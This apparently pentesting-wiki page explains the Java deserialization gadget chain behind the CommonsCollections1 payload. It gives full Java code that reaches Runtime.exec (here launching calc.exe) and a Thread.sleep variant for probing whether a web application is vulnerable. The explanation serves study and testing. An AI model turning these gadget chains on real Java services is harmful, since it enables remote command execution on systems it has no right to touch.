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# CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
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## Java Transformers to Rutime exec()
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In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1PayloadOnly {
public static void main(String... args) {
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class), //(1)
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
), //(2)
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
), //(3)
new InvokerTransformer("exec",
new Class[]{String.class},
command
) //(4)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap< >();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
}
```
If you don't know anything about java deserialization payloads could be difficult to figure out why this code will execute a calc.
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First of all you need to know that a **Transformer in Java** is something that **receives a class** and **transforms it to a different one** . \
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Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:
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```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```
Or **more exactly** , what is going to be executed at the end would be:
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
### How
So, how is the first payload presented equivalent to those "simple" one-liners?
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**First** of all, you can notice in the payload that a **chain (array) of transforms are created** :
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```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
//(1) - Get gadget Class (from Runtime class)
new ConstantTransformer(Runtime.class),
//(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}
),
//(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
),
//(4) - Use the Runtime object to call exec with arbitrary commands
new InvokerTransformer("exec",
new Class[]{String.class},
command
)
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```
If you read the code you will notice that if you somehow chains the transformation of the array you could be able to execute arbitrary commands.
So, **how are those transforms chained?**
```java
Map map = new HashMap< >();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```
In the last section of the payload you can see that a **Map object is created** . Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute:
```java
protected LazyMap(Map map, Transformer factory) {
super(map);
if (factory == null) {
throw new IllegalArgumentException("Factory must not be null");
}
this.factory = factory;
}
```
And then the great finale is executed: `lazyMap.get("anything");`
This is the code of the `get` function:
```java
public Object get(Object key) {
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}
```
And this is the code of the `transform` function
```java
public Object transform(Object object) {
for (int i = 0; i < iTransformers.length ; i + + ) {
object = iTransformers[i].transform(object);
}
return object;
}
```
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So, remember that inside **factory** we had saved ** `chainedTransformer` ** and inside of the ** `transform` ** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed** . Therefore, **all the transforms are chained executing the malicious payload** .
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### Summary
At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
```java
Object value = "someting";
value = new ConstantTransformer(Runtime.class).transform(value); //(1)
value = new InvokerTransformer("getMethod",
new Class[]{ String.class, Class[].class},
new Object[]{"getRuntime", null}
).transform(value); //(2)
value = new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}
).transform(value); //(3)
value = new InvokerTransformer("exec",
new Class[]{String.class},
command
).transform(value); //(4)
```
_Note how `value` is the input of each transform and the output of the previous transform , allowing the execution of a one-liner:_
```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```
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Note that here it **was explained the gadgets** used for the **ComonsCollections1** payload. But it's left **how all this starts it's executing** . You can see [here that **ysoserial** ](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java ), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized** , it will **invoke** the `payload.get()` function that will **execute the whole payload** .
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## Java Thread Sleep
This payload could be **handy to identify if the web is vulnerable as it will execute a sleep if it is** .
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;
public class CommonsCollections1Sleep {
public static void main(String... args) {
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Thread.class),
new InvokerTransformer("getMethod",
new Class[]{
String.class, Class[].class
},
new Object[]{
"sleep", new Class[]{Long.TYPE}
}),
new InvokerTransformer("invoke",
new Class[]{
Object.class, Object[].class
}, new Object[]
{
null, new Object[] {7000L}
}),
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
Map map = new HashMap< >();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
//Execute gadgets
lazyMap.get("anything");
}
}
```
## More Gadgets
You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html ](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html )
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